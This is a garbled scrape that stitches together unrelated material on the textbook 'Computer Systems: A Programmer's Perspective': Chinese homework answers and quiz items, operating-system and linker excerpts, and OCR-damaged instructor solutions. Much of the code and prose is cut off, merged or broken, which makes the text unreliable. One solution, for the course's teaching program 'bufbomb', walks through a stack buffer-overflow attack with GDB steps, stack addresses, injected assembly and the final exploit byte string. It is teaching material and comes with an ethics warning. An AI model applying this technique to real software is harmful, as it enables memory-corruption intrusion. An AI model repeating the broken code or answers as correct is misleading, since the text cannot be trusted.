深入理解计算机系统(第二版) 家庭作业 第七章
深入理解计算机系统(第二版) 家庭作业答案

int int_shifts_are_arithmetic(){int x = -1;return (x>>1) == -1;}2.63对于sra,主要的工作是将xrsl的第w-k-1位扩展到前面的高位。
对于srl,注意工作就是将前面的高位清0,即xsra & (1<<(w-k) - 1)。
int sra(int x, int k){int xsrl = (unsigned) x >> k;int w = sizeof(int) << 3;unsigned z = 1 << (w-k-1);unsigned mask = z - 1;unsigned right = mask & xsrl;unsigned left = ~mask & (~(z&xsrl) + z);return left | right;}int srl(unsigned x, int k){int xsra = (int) x >> k;int w = sizeof(int)*8;unsigned z = 2 << (w-k-1);return (z - 1) & xsra;}INT_MIN);}2.74对于有符号整数相减,溢出的规则可以总结为:t = a-b;如果a, b 同号,则肯定不会溢出。
如果a>=0 && b<0,则只有当t<=0时才算溢出。
如果a<0 && b>=0,则只有当t>=0时才算溢出。

深入理解计算机系统配套练习卷Chapter 11.1.0 字母a的ASCII码为97,那么love中各字母ASCII码之和是()A、99B、520C、438D、3601.2.0_1 在编译过程中,hell.c经过汇编阶段后生成文件为()A、hell.iB、hell.sC、hell.oD、hell.exe1.2.0_2 在编译过程中,hell.c经过()阶段生成hell.s。
A、预处理B、编译C、汇编D、链接1.4.1 下面哪一项不是I/O设备A、鼠标B、显示器C、键盘D、《深入理解计算机系统》1.4.2 数据可以不通过处理器直接从磁盘到达主存吗?DMA又是什么?A、可以;直接存储器存取B、可以;动态存储器存取C、不可以;直接存储器存取D、不可以;动态存储器存取Chapter 22.1.1_1 二进制串11010110对应的十六进制数是()A、0xx0B、0xD6C、0XC6D、0Xd52.1.1_2 十六进制数0x77对应的十进制数为()A、77B、117C、109D、1192.1.3 对于32位机器,char * 的字节数为()A、1B、2C、4D、82.1.4_1 使用小端法的机器,数字0x123678的高位字节是()A、0x12B、0x21C、0x78D、0x872.1.4_2 从使用小端法的机器读入数字0x1234,存入使用大端法的机器,这时高位字节是()A、0x12B、0x21C、0x34D、0x432.1.8 char a=0xdb, 则~a 的值为()A、0xdbB、0xbdC、0x24D、0x422.1.8 int a=1, b=2, 经运算a^=b^=a^=b 后结果为()A、a=3, b=2B、a=1, b=2C、a=2, b=1D、不知道2.1.10 int a = 3, 则a<<3 的结果为()A、3B、24C、12D、482.2.1 unsigned char 的最小值为()A、128B、255C、-127D、02.2.3 对长度为4位的整数数据,-5对应的补码编码为()A、1011B、1101C、0101D、10102.3.2 对长度为4的整数数据,x=[1010], y=[1100],x+y补码加法的结果为()A、1010B、0110C、1100D、10110Chapter 33.2.2 命令unix> gcc -O1 -C code.c 所生成文件相当于经编译过程中()阶段后的结果。

A 2B 4C 6D 8微型计算机硬件系统中最核心的部位是__。
A 主板B. CPUC 内存处理器D I/O设备CPU中有一个程序计数器(又称指令计数器)。
A.微机型号B.内存容量C.运算速度D.机器字长第二章题目求下列算是得值,结果用十六进制表示:0x503c + 64 =______A. 0x507cB.0x507bC. 0x506cD.0x506b将十进制数167用十六进制表示的结果是______A.0XB7B.0XA7C.0XB6D.0XA6位级运算:0x69 & 0x55 的结果是_______A.0X40B.0X41C.0X42D.0X43逻辑运算!!0x41的结果用十六进制表示为_____A.0X00B.0X41C.0X14D.0X01位移运算:对参数则x>>4(算术右移)的结果是______A.[01010000]B.[00001001]C.D.截断:假设一个4位数值(用十六进制数字0~F表示)截断到一个3位数值(用十六进制0~7表示),[1011]截断后的补码值是___A.-3B.3C.5D.-5浮点表示:数字5用浮点表示时的小数字段frac的解释为描述小数值f,则f=______A.1/2B.1/4C.1/8D.1/162.4.2 _25-8数字5用浮点表示,则指数部分E=_____A.1B.2C.3D.4数字5用浮点表示,则指数部分位表示为___A .2^ (K-1)+1B. 2^K+1C. 2^ (K-1)D. 2^K浮点运算:(3.14+1e10)-1e10 在计算机中的运算结果为A .3.14B .0C .1e10D .0.0第三章题目计算Imm(E b ,E i ,s)这种寻址模式所表示的有效地址:A .Imm + R[E b ]+R[E s ] *sB. Imm + R[E b ]+R[Es]C. Imm + R[E b ]D. Imm +R[E s ]下面这种寻址方式属于_____M[R[E b ]]A. 立即数寻址B. 寄存器寻址C. 绝对寻址D. 间接寻址假设初始值:%dh=CD,则执行下面一条指令后,%eax的值为多少?MOVB %DH ,%ALA. %eax= 987654CDB. %eax= CD765432C %eax= FFFFFFCDD. %eax= 000000CD假设初始值:%dh=CD,则执行下面一条指令后,%eax的值为多少?MOVSBL %DH ,%ALA. %eax= 987654CDB. %eax= CD765432C %eax= FFFFFFCDD. %eax= 000000CD假设初始值:%dh=CD,则执行下面一条指令后,%eax的值为多少?MOVZBL %DH ,%ALA. %eax= 987654CDB. %eax= CD765432C %eax= FFFFFFCDD. %eax= 000000CD假设寄存器%eax的值为x,%ecx的值为y,则指明下面汇编指令存储在寄存器%edx中的值Leal (%eax ,%ecx),%edxA. xB yC x + yD x –y假设寄存器%eax的值为x,%ecx的值为y,则指明下面汇编指令存储在寄存器%edx中的值Leal 9(%eax ,%ecx , 2),%edxA. x +y +2B 9*(x + y + 2)C 9 + x + y +2D 9 + x + 2y条件码CF表示______A 零标志B 符号标志C 溢出标志D进位标志条件码OF表示______A 零标志B 符号标志C 溢出标志D进位标志在奔腾4上运行,当分支行为模式非常容易预测时,我们的代码需要大约16个时钟周期,而当模式是随机时,大约需要31个时钟周期,则预测错误处罚大约是多少?A. 25B. 30C. 35D. 40第五章题目指针xp指向x,指针yp指向y,下面是一个交换两个值得过程:Viod swap (int *xp ,int *yp){*xp = *xp + *yp //x+y*yp = *xp - *yp //x+y-y=x*xp = *xp - *yp //x+y-x=y}考虑,当xp=yp时,xp处的值是多少A . xB. yC . 0D.不确定考虑下面函数:int min( int x , int y ) { return x < y x : y;}int max( int x , int y ){ return x < y y : x; }viod incr (int *xp ,int v) { *xp += v;}int square( int x ) { return x *x; }下面一个片段调用这些函数:for( i = min(x,y) ;i< max(x,y); incr(&i,1))t +=square(i) ;假设x等于10,y等于100.指出该片段中4个函数 min (),max(),incr(),square()每个被调用的次数一次为A.91 1 90 90B.1 91 90 90C.1 1 90 90D.90 1 90 90考虑下面函数:int min( int x , int y ) { return x < y x : y;}int max( int x , int y ){ return x < y y : x; }viod incr (int *xp ,int v) { *xp += v;}int square( int x ) { return x *x; }下面一个片段调用这些函数:for( i = max(x,y) -1;i >= min(x,y); incr(&i,-1))t +=square(i) ;假设x等于10,y等于100.指出该片段中4个函数 min (),max(),incr(),square()每个被调用的次数一次为A.91 1 90 90B.1 91 90 90C.1 1 90 90D.90 1 90 90考虑下面函数:int min( int x , int y ) { return x < y x : y;}int max( int x , int y ){ return x < y y : x; }viod incr (int *xp ,int v) { *xp += v;}int square( int x ) { return x *x; }下面一个片段调用这些函数:Int low = min(x,y);Int high = max(x,y);For(i= low;i<high;incr(&i,1)t +=square(i);假设x等于10,y等于100.指出该片段中4个函数 min (),max(),incr(),square()每个被调用的次数依次为A.91 1 90 90B.1 91 90 90C.1 1 90 90D.90 1 90 90假设某个函数有多个变种,这些变种保持函数的行为,又具有不同的性能特性,对于其中的三个变种,我们发现运行时间(以时钟周期为单位)可以用下面的函数近似的估计版本1:60+35n版本2:136+4n版本3:157+1.25n问题是当n=2时,哪个版本最快?A.1B.2C.3D.无法比较假设某个函数有多个变种,这些变种保持函数的行为,又具有不同的性能特性,对于其中的三个变种,我们发现运行时间(以时钟周期为单位)可以用下面的函数近似的估计版本1:60+35n版本2:136+4n版本3:157+1.25n问题是当n=5时,哪个版本最快?A.1B.2C.3D.无法比较假设某个函数有多个变种,这些变种保持函数的行为,又具有不同的性能特性,对于其中的三个变种,我们发现运行时间(以时钟周期为单位)可以用下面的函数近似的估计版本1:60+35n版本2:136+4n版本3:157+1.25n问题是当n=10时,哪个版本最快?A.1B.2C.3D.无法比较下面有一个函数:double poly( double a[] ,double x, int degree){long int i;double result = a[0];double xpwr =x;for(i=1 ; i<=degree; i++){result += a[i] *xpwr;xpwr =x *xpwr;}return result;}当degree=n,这段代码共执行多少次加法和多少次乘法?A.n nB.2n nC.n 2nD.2n 2n一名司机运送一车货物从A地到B地,总距离为2500公里。
计算机操作系统教程(第二版)(章 (7)

第7章 Linux操作系统简介
伯克利(Berkeley)的加州大学是学术用户中的一个。在这 里,UNIX得到了计算机系统研究小组(CSRG)的广泛使用,并 且对它进行了修改,从而产生了UNIX的一大系列——伯克利 软件开发(BSD)UNIX。除了AT&T所提供的UNIX系列之外, BSD是最有影响力的UNIX系列。 BSD在UNIX中增加了很多 显著特性,例如TCP/IP网络,更好的用户文件系统(UFS)等, 并且改进了AT&T的内存管理代码。在用户需求和用户编程的 促进下,BSD风格的UNIX一般要比AT&T的UNIX更具有创新 性,而且改进也更为迅速。
第7章 Linux操作系统简介
(4) 健壮性和安全性(Robustness and Security)。Linux必须 健壮、稳定,系统自身应该没有任何缺陷,并且它还应该可以 保护进程(用户),以防止互相干扰。保证Linux健壮性和安全 性的一个重要的因素是其开放的开发过程,它可以被看作是一 种广泛而严格的检查。内核中的每一行代码、每一个改变都会 很快由世界上数不清的程序员检验。还有一些程序员专门负责 寻找和报告潜在的缺陷。以前检查中所没有发现的缺陷可以通 过这些人的努力来定位、修复,而这种修复又合并进主开发树, 以使所有的人都能够受益。
放的,是符合标准规范的32位(在64位CPU上是64位)操作系 统。Linux拥有现代操作系统所具有的功能,例如:真正的抢 先式多任务处理;支持多用户;提供内存保护机制;支持虚拟 内存;支持对称多处理SMP(Symmetric Multiprocessing); 符合POSIX标准;提供联网功能以及大量的网络应用;是图形 用户接口和桌面环境(实际上桌面环境并不只一个);保证速 度和稳定性要求等。

How Linkers Use Static Libraries to Resolve References
For each input file f on the command line, the linker determines if f is an object file or an archive.If f is an object file, the linker adds f to E, updates U and D to reflect the symbol definitions and references in f, and proceeds to the next input file. If f is an archive, the linker attempts to match the unresolved symbols in U against the symbols defined by the members of the archive. If some archive member, m, defines a symbol that resolves a reference in U, then mis added to E, and the linker updates U and D to reflect the symbol definitions and references inm. This process iterates over the member object files in the archive until a fixed point is reached where U and D no longer change. At this point, any member object files not contained in E are simply discarded and the linker proceeds to the next input file. If U is nonempty when the linker finishes scanning the input files on the command line, it prints an error and terminates. Otherwise it merges and relocates the object files in E to build the output executable file

int saturating_add(int x, int y){int w = sizeof(int)<<3;int t = x + y;int ans = x + y;x>>=(w-1);y>>=(w-1);t>>=(w-1);int pos_ovf = ~x&~y&t;int neg_ovf = x&y&~t;int novf = ~(pos_ovf|neg_ovf);return(pos_ovf & INT_MAX) | (novf & ans) | (neg_ovf & INT_MIN); }2.74对于有符号整数相减,溢出的规则可以总结为:t = a-b;如果a, b 同号,则肯定不会溢出。
如果a>=0 && b<0,则只有当t<=0时才算溢出。
如果a<0 && b>=0,则只有当t>=0时才算溢出。
不过,上述t肯定不会等于0,因为当a,b不同号时:1) a!=b,因此a-b不会等于0。
2) a-b <= abs(a) + abs(b) <= abs(TMax) + abs(TMin)=(2^w - 1)所以,a,b异号,t,b同号即可判定为溢出。
int tsub_ovf(int x, int y){int w = sizeof(int)<<3;int t = x - y;x>>=(w-1);y>>=(w-1);t>>=(w-1);return(x != y) && (y == t);}顺便整理一下汇编中CF,OF的设定规则(个人总结,如有不对之处,欢迎指正)。
t = a + b;CF: (unsigned t) < (unsigned a) 进位标志OF: (a<0 == b<0) && (t<0 != a<0)t = a - b;CF: (a<0 && b>=0) || ((a<0 == b<0) && t<0) 退位标志OF: (a<0 != b<0) && (b<0 == t<0)汇编中,无符号和有符号运算对条件码(标志位)的设定应该是相同的,但是对于无符号比较和有符号比较,其返回值是根据不同的标志位进行的。
深入理解计算机系统 第二版 习题答案

Randal E. Bryant David R. O’Hallaron
December 4, 2003
1Copyright c 2003, R. E. Bryant, D. R. O’Hallaron. All rights reserved.
6 void show_long(long int x)
show_bytes((byte_pointer) &x, sizeof(long));
11 void show_double(double x)
12 {
show_bytes((byte_pointer) &x, sizeof(double));
14 }
Problem 2.41 Solution: There are many ways to solve this problem. The basic idea is to create some multibyte datum with different values for the most and least-significant bytes. We then read byte 0 and determine which byte it is. In the following solution is to create an int with value 1. We then access its first byte and convert it to an int. This byte will equal 0 on a big-endian machine and 1 on a little-endian machine.

其中经典教材《深入理解计算机系统》第2版(英文名:Computer Systems: A Programmer’s Perspective, 2nd Edition)提供了系统性的学习框架,涵盖了计算机系统所有的关键概念,从硬件到操作系统到应用程序。


第 7 章 习 题 答 案 (第二版书)2(4),2(5),2(9),2(10)-- (省略) 6, 17,23,24(其中表中数据都是16进制)6. 某计算机中已配有0000H ~7FFFH 的ROM 区域,现在再用8K×4位的RAM 芯片形成32K×8位的存储区域,CPU 地址总线为A0-A15,数据总线为D0-D7,控制信号为R/W#(读/写)、MREQ#(访存)。
要求说明地址译码方案,并画出ROM 芯片、RAM 芯片与CPU 之间的连接图。
假定上述其他条件不变,只是CPU 地址线改为24根,地址范围000000H ~007FFFH 为ROM 区,剩下的所有地址空间都用8K×4位的RAM 芯片配置,则需要多少个这样的RAM 芯片? 参考答案:CPU 地址线共16位,故存储器地址空间为0000H ~FFFFH ,其中,8000H ~FFFFH 为RAM 区,共215=32K 个单元,其空间大小为32KB ,故需8K×4位的芯片数为32KB/8K×4位= 4×2 = 8片。
因为ROM 区在0000H ~7FFFH ,RAM 区在8000H ~FFFFH ,所以可通过最高位地址A 15来区分,当A 15为0时选中ROM 芯片;为1时选中RAM 芯片,此时,根据A 14和A 13进行译码,得到4个译码信号,分别用于4组字扩展芯片的片选信号。
(图略,可参照图4.15)若CPU 地址线为24位,ROM 区为000000H ~007FFFH ,则ROM 区大小为32KB ,总大小为16MB=214KB=512×32KB ,所以RAM 区大小为511×32KB ,共需使用RAM 芯片数为511×32KB/8K×4位=511×4×2个芯片。
17. 假设某计算机的主存地址空间大小为64MB ,采用字节编址方式。
深入理解计算机系统 家庭作业答案

2) a-b <= abs(a) + abs(b) <= abs(TMax) + abs(TMin)=(2^w - 1)所以,a,b异号,t,b同号即可判定为溢出。
int tsub_ovf(int x, int y){int w = sizeof(int)<<3;int t = x - y;x>>=(w-1);y>>=(w-1);t>>=(w-1);return(x != y) && (y == t);}顺便整理一下汇编中CF,OF的设定规则(个人总结,如有不对之处,欢迎指正)。
t = a + b;CF: (unsigned t) < (unsigned a) 进位标志OF: (a<0 == b<0) && (t<0 != a<0)t = a - b;CF: (a<0 && b>=0) || ((a<0 == b<0) && t<0) 退位标志OF: (a<0 != b<0) && (b<0 == t<0)汇编中,无符号和有符号运算对条件码(标志位)的设定应该是相同的,但是对于无符号比较和有符号比较,其返回值是根据不同的标志位进行的。
根据2-18,不难推导, (x'*y')_h = (x*y)_h + x(w-1)*y + y(w-1)*x。
unsigned unsigned_high_prod(unsigned x, unsigned y){int w = sizeof(int)<<3;A. false,float只能精确表示最高位1和最低位的1的位数之差小于24的整数。

Computer Systems:A Programmer’s PerspectiveInstructor’s Solution Manual1Randal E.BryantDavid R.O’HallaronDecember4,20031Copyright c2003,R.E.Bryant,D.R.O’Hallaron.All rights reserved.2Chapter1Solutions to Homework ProblemsThe text uses two different kinds of exercises:Practice Problems.These are problems that are incorporated directly into the text,with explanatory solutions at the end of each chapter.Our intention is that students will work on these problems as they read the book.Each one highlights some particular concept.Homework Problems.These are found at the end of each chapter.They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.This document gives the solutions to the homework problems.1.1Chapter1:A Tour of Computer Systems1.2Chapter2:Representing and Manipulating InformationProblem2.40Solution:This exercise should be a straightforward variation on the existing code.2CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS1011void show_double(double x)12{13show_bytes((byte_pointer)&x,sizeof(double));14}code/data/show-ans.c 1int is_little_endian(void)2{3/*MSB=0,LSB=1*/4int x=1;56/*Return MSB when big-endian,LSB when little-endian*/7return(int)(*(char*)&x);8}1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION3 There are many solutions to this problem,but it is a little bit tricky to write one that works for any word size.Here is our solution:code/data/shift-ans.c The above code peforms a right shift of a word in which all bits are set to1.If the shift is arithmetic,the resulting word will still have all bits set to1.Problem2.45Solution:This problem illustrates some of the challenges of writing portable code.The fact that1<<32yields0on some32-bit machines and1on others is common source of bugs.A.The C standard does not define the effect of a shift by32of a32-bit datum.On the SPARC(andmany other machines),the expression x<<k shifts by,i.e.,it ignores all but the least significant5bits of the shift amount.Thus,the expression1<<32yields1.pute beyond_msb as2<<31.C.We cannot shift by more than15bits at a time,but we can compose multiple shifts to get thedesired effect.Thus,we can compute set_msb as2<<15<<15,and beyond_msb as set_msb<<1.Problem2.46Solution:This problem highlights the difference between zero extension and sign extension.It also provides an excuse to show an interesting trick that compilers often use to use shifting to perform masking and sign extension.A.The function does not perform any sign extension.For example,if we attempt to extract byte0fromword0xFF,we will get255,rather than.B.The following code uses a well-known trick for using shifts to isolate a particular range of bits and toperform sign extension at the same time.First,we perform a left shift so that the most significant bit of the desired byte is at bit position31.Then we right shift by24,moving the byte into the proper position and peforming sign extension at the same time.4CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 3int left=word<<((3-bytenum)<<3);4return left>>24;5}Problem2.48Solution:This problem lets students rework the proof that complement plus increment performs negation.We make use of the property that two’s complement addition is associative,commutative,and has additive ing C notation,if we define y to be x-1,then we have˜y+1equal to-y,and hence˜y equals -y+1.Substituting gives the expression-(x-1)+1,which equals-x.Problem2.49Solution:This problem requires a fairly deep understanding of two’s complement arithmetic.Some machines only provide one form of multiplication,and hence the trick shown in the code here is actually required to perform that actual form.As seen in Equation2.16we have.Thefinal term has no effect on the-bit representation of,but the middle term represents a correction factor that must be added to the high order bits.This is implemented as follows:code/data/uhp-ans.c Problem2.50Solution:Patterns of the kind shown here frequently appear in compiled code.1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION5A.:x+(x<<2)B.:x+(x<<3)C.:(x<<4)-(x<<1)D.:(x<<3)-(x<<6)Problem2.51Solution:Bit patterns similar to these arise in many applications.Many programmers provide them directly in hex-adecimal,but it would be better if they could express them in more abstract ways.A..˜((1<<k)-1)B..((1<<k)-1)<<jProblem2.52Solution:Byte extraction and insertion code is useful in many contexts.Being able to write this sort of code is an important skill to foster.code/data/rbyte-ans.c Problem2.53Solution:These problems are fairly tricky.They require generating masks based on the shift amounts.Shift value k equal to0must be handled as a special case,since otherwise we would be generating the mask by performing a left shift by32.6CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1unsigned srl(unsigned x,int k)2{3/*Perform shift arithmetically*/4unsigned xsra=(int)x>>k;5/*Make mask of low order32-k bits*/6unsigned mask=k?((1<<(32-k))-1):˜0;78return xsra&mask;9}code/data/rshift-ans.c 1int sra(int x,int k)2{3/*Perform shift logically*/4int xsrl=(unsigned)x>>k;5/*Make mask of high order k bits*/6unsigned mask=k?˜((1<<(32-k))-1):0;78return(x<0)?mask|xsrl:xsrl;9}.1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION7B.(a)For,we have,,code/data/floatge-ans.c 1int float_ge(float x,float y)2{3unsigned ux=f2u(x);4unsigned uy=f2u(y);5unsigned sx=ux>>31;6unsigned sy=uy>>31;78return9(ux<<1==0&&uy<<1==0)||/*Both are zero*/10(!sx&&sy)||/*x>=0,y<0*/11(!sx&&!sy&&ux>=uy)||/*x>=0,y>=0*/12(sx&&sy&&ux<=uy);/*x<0,y<0*/13},8CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS This exercise is of practical value,since Intel-compatible processors perform all of their arithmetic in ex-tended precision.It is interesting to see how adding a few more bits to the exponent greatly increases the range of values that can be represented.Description Extended precisionValueSmallest denorm.Largest norm.Problem2.59Solution:We have found that working throughfloating point representations for small word sizes is very instructive. Problems such as this one help make the description of IEEEfloating point more concrete.Description8000Smallest value4700Largest denormalized———code/data/fpwr2-ans.c1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS91/*Compute2**x*/2float fpwr2(int x){34unsigned exp,sig;5unsigned u;67if(x<-149){8/*Too small.Return0.0*/9exp=0;10sig=0;11}else if(x<-126){12/*Denormalized result*/13exp=0;14sig=1<<(x+149);15}else if(x<128){16/*Normalized result.*/17exp=x+127;18sig=0;19}else{20/*Too big.Return+oo*/21exp=255;22sig=0;23}24u=exp<<23|sig;25return u2f(u);26}10CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS int decode2(int x,int y,int z){int t1=y-z;int t2=x*t1;int t3=(t1<<31)>>31;int t4=t3ˆt2;return t4;}Problem3.32Solution:This code example demonstrates one of the pedagogical challenges of using a compiler to generate assembly code examples.Seemingly insignificant changes in the C code can yield very different results.Of course, students will have to contend with this property as work with machine-generated assembly code anyhow. They will need to be able to decipher many different code patterns.This problem encourages them to think in abstract terms about one such pattern.The following is an annotated version of the assembly code:1movl8(%ebp),%edx x2movl12(%ebp),%ecx y3movl%edx,%eax4subl%ecx,%eax result=x-y5cmpl%ecx,%edx Compare x:y6jge.L3if>=goto done:7movl%ecx,%eax8subl%edx,%eax result=y-x9.L3:done:A.When,it will computefirst and then.When it just computes.B.The code for then-statement gets executed unconditionally.It then jumps over the code for else-statement if the test is false.C.then-statementt=test-expr;if(t)goto done;else-statementdone:D.The code in then-statement must not have any side effects,other than to set variables that are also setin else-statement.1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS11Problem3.33Solution:This problem requires students to reason about the code fragments that implement the different branches of a switch statement.For this code,it also requires understanding different forms of pointer dereferencing.A.In line29,register%edx is copied to register%eax as the return value.From this,we can infer that%edx holds result.B.The original C code for the function is as follows:1/*Enumerated type creates set of constants numbered0and upward*/2typedef enum{MODE_A,MODE_B,MODE_C,MODE_D,MODE_E}mode_t;34int switch3(int*p1,int*p2,mode_t action)5{6int result=0;7switch(action){8case MODE_A:9result=*p1;10*p1=*p2;11break;12case MODE_B:13*p2+=*p1;14result=*p2;15break;16case MODE_C:17*p2=15;18result=*p1;19break;20case MODE_D:21*p2=*p1;22/*Fall Through*/23case MODE_E:24result=17;25break;26default:27result=-1;28}29return result;30}Problem3.34Solution:This problem gives students practice analyzing disassembled code.The switch statement contains all the features one can imagine—cases with multiple labels,holes in the range of possible case values,and cases that fall through.12CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1int switch_prob(int x)2{3int result=x;45switch(x){6case50:7case52:8result<<=2;9break;10case53:11result>>=2;12break;13case54:14result*=3;15/*Fall through*/16case55:17result*=result;18/*Fall through*/19default:20result+=10;21}2223return result;24}code/asm/varprod-ans.c 1int var_prod_ele_opt(var_matrix A,var_matrix B,int i,int k,int n) 2{3int*Aptr=&A[i*n];4int*Bptr=&B[k];5int result=0;6int cnt=n;78if(n<=0)9return result;1011do{12result+=(*Aptr)*(*Bptr);13Aptr+=1;14Bptr+=n;15cnt--;1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS13 16}while(cnt);1718return result;19}code/asm/structprob-ans.c 1typedef struct{2int idx;3int x[4];4}a_struct;14CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1/*Read input line and write it back*/2/*Code will work for any buffer size.Bigger is more time-efficient*/ 3#define BUFSIZE644void good_echo()5{6char buf[BUFSIZE];7int i;8while(1){9if(!fgets(buf,BUFSIZE,stdin))10return;/*End of file or error*/11/*Print characters in buffer*/12for(i=0;buf[i]&&buf[i]!=’\n’;i++)13if(putchar(buf[i])==EOF)14return;/*Error*/15if(buf[i]==’\n’){16/*Reached terminating newline*/17putchar(’\n’);18return;19}20}21}An alternative implementation is to use getchar to read the characters one at a time.Problem3.38Solution:Successfully mounting a buffer overflow attack requires understanding many aspects of machine-level pro-grams.It is quite intriguing that by supplying a string to one function,we can alter the behavior of another function that should always return afixed value.In assigning this problem,you should also give students a stern lecture about ethical computing practices and dispell any notion that hacking into systems is a desirable or even acceptable thing to do.Our solution starts by disassembling bufbomb,giving the following code for getbuf: 1080484f4<getbuf>:280484f4:55push%ebp380484f5:89e5mov%esp,%ebp480484f7:83ec18sub$0x18,%esp580484fa:83c4f4add$0xfffffff4,%esp680484fd:8d45f4lea0xfffffff4(%ebp),%eax78048500:50push%eax88048501:e86a ff ff ff call8048470<getxs>98048506:b801000000mov$0x1,%eax10804850b:89ec mov%ebp,%esp11804850d:5d pop%ebp12804850e:c3ret13804850f:90nopWe can see on line6that the address of buf is12bytes below the saved value of%ebp,which is4bytes below the return address.Our strategy then is to push a string that contains12bytes of code,the saved value1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS15 of%ebp,and the address of the start of the buffer.To determine the relevant values,we run GDB as follows:1.First,we set a breakpoint in getbuf and run the program to that point:(gdb)break getbuf(gdb)runComparing the stopping point to the disassembly,we see that it has already set up the stack frame.2.We get the value of buf by computing a value relative to%ebp:(gdb)print/x(%ebp+12)This gives0xbfffefbc.3.Wefind the saved value of register%ebp by dereferencing the current value of this register:(gdb)print/x*$ebpThis gives0xbfffefe8.4.Wefind the value of the return pointer on the stack,at offset4relative to%ebp:(gdb)print/x*((int*)$ebp+1)This gives0x8048528We can now put this information together to generate assembly code for our attack:1pushl$0x8048528Put correct return pointer back on stack2movl$0xdeadbeef,%eax Alter return value3ret Re-execute return4.align4Round up to125.long0xbfffefe8Saved value of%ebp6.long0xbfffefbc Location of buf7.long0x00000000PaddingNote that we have used the.align statement to get the assembler to insert enough extra bytes to use up twelve bytes for the code.We added an extra4bytes of0s at the end,because in some cases OBJDUMP would not generate the complete byte pattern for the data.These extra bytes(plus the termininating null byte)will overflow into the stack frame for test,but they will not affect the program behavior. Assembling this code and disassembling the object code gives us the following:10:6828850408push$0x804852825:b8ef be ad de mov$0xdeadbeef,%eax3a:c3ret4b:90nop Byte inserted for alignment.5c:e8ef ff bf bc call0xbcc00000Invalid disassembly.611:ef out%eax,(%dx)Trying to diassemble712:ff(bad)data813:bf00000000mov$0x0,%edi16CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS From this we can read off the byte sequence:6828850408b8ef be ad de c390e8ef ff bf bc ef ff bf00000000Problem3.39Solution:This problem is a variant on the asm examples in the text.The code is actually fairly simple.It relies on the fact that asm outputs can be arbitrary lvalues,and hence we can use dest[0]and dest[1]directly in the output list.code/asm/asmprobs-ans.c Problem3.40Solution:For this example,students essentially have to write the entire function in assembly.There is no(apparent) way to interface between thefloating point registers and the C code using extended asm.code/asm/fscale.c1.4.CHAPTER4:PROCESSOR ARCHITECTURE17 1.4Chapter4:Processor ArchitectureProblem4.32Solution:This problem makes students carefully examine the tables showing the computation stages for the different instructions.The steps for iaddl are a hybrid of those for irmovl and OPl.StageFetchrA:rB M PCvalP PCExecuteR rB valEPC updateleaveicode:ifun M PCDecodevalB RvalE valBMemoryWrite backR valMPC valPProblem4.34Solution:The following HCL code includes implementations of both the iaddl instruction and the leave instruc-tions.The implementations are fairly straightforward given the computation steps listed in the solutions to problems4.32and4.33.You can test the solutions using the test code in the ptest subdirectory.Make sure you use command line argument‘-i.’18CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1####################################################################2#HCL Description of Control for Single Cycle Y86Processor SEQ#3#Copyright(C)Randal E.Bryant,David R.O’Hallaron,2002#4####################################################################56##This is the solution for the iaddl and leave problems78####################################################################9#C Include’s.Don’t alter these#10#################################################################### 1112quote’#include<stdio.h>’13quote’#include"isa.h"’14quote’#include"sim.h"’15quote’int sim_main(int argc,char*argv[]);’16quote’int gen_pc(){return0;}’17quote’int main(int argc,char*argv[])’18quote’{plusmode=0;return sim_main(argc,argv);}’1920####################################################################21#Declarations.Do not change/remove/delete any of these#22#################################################################### 2324#####Symbolic representation of Y86Instruction Codes#############25intsig INOP’I_NOP’26intsig IHALT’I_HALT’27intsig IRRMOVL’I_RRMOVL’28intsig IIRMOVL’I_IRMOVL’29intsig IRMMOVL’I_RMMOVL’30intsig IMRMOVL’I_MRMOVL’31intsig IOPL’I_ALU’32intsig IJXX’I_JMP’33intsig ICALL’I_CALL’34intsig IRET’I_RET’35intsig IPUSHL’I_PUSHL’36intsig IPOPL’I_POPL’37#Instruction code for iaddl instruction38intsig IIADDL’I_IADDL’39#Instruction code for leave instruction40intsig ILEAVE’I_LEAVE’4142#####Symbolic representation of Y86Registers referenced explicitly##### 43intsig RESP’REG_ESP’#Stack Pointer44intsig REBP’REG_EBP’#Frame Pointer45intsig RNONE’REG_NONE’#Special value indicating"no register"4647#####ALU Functions referenced explicitly##### 48intsig ALUADD’A_ADD’#ALU should add its arguments4950#####Signals that can be referenced by control logic####################1.4.CHAPTER4:PROCESSOR ARCHITECTURE195152#####Fetch stage inputs#####53intsig pc’pc’#Program counter54#####Fetch stage computations#####55intsig icode’icode’#Instruction control code56intsig ifun’ifun’#Instruction function57intsig rA’ra’#rA field from instruction58intsig rB’rb’#rB field from instruction59intsig valC’valc’#Constant from instruction60intsig valP’valp’#Address of following instruction 6162#####Decode stage computations#####63intsig valA’vala’#Value from register A port64intsig valB’valb’#Value from register B port 6566#####Execute stage computations#####67intsig valE’vale’#Value computed by ALU68boolsig Bch’bcond’#Branch test6970#####Memory stage computations#####71intsig valM’valm’#Value read from memory727374####################################################################75#Control Signal Definitions.#76#################################################################### 7778################Fetch Stage################################### 7980#Does fetched instruction require a regid byte?81bool need_regids=82icode in{IRRMOVL,IOPL,IPUSHL,IPOPL,83IIADDL,84IIRMOVL,IRMMOVL,IMRMOVL};8586#Does fetched instruction require a constant word?87bool need_valC=88icode in{IIRMOVL,IRMMOVL,IMRMOVL,IJXX,ICALL,IIADDL};8990bool instr_valid=icode in91{INOP,IHALT,IRRMOVL,IIRMOVL,IRMMOVL,IMRMOVL,92IIADDL,ILEAVE,93IOPL,IJXX,ICALL,IRET,IPUSHL,IPOPL};9495################Decode Stage################################### 9697##What register should be used as the A source?98int 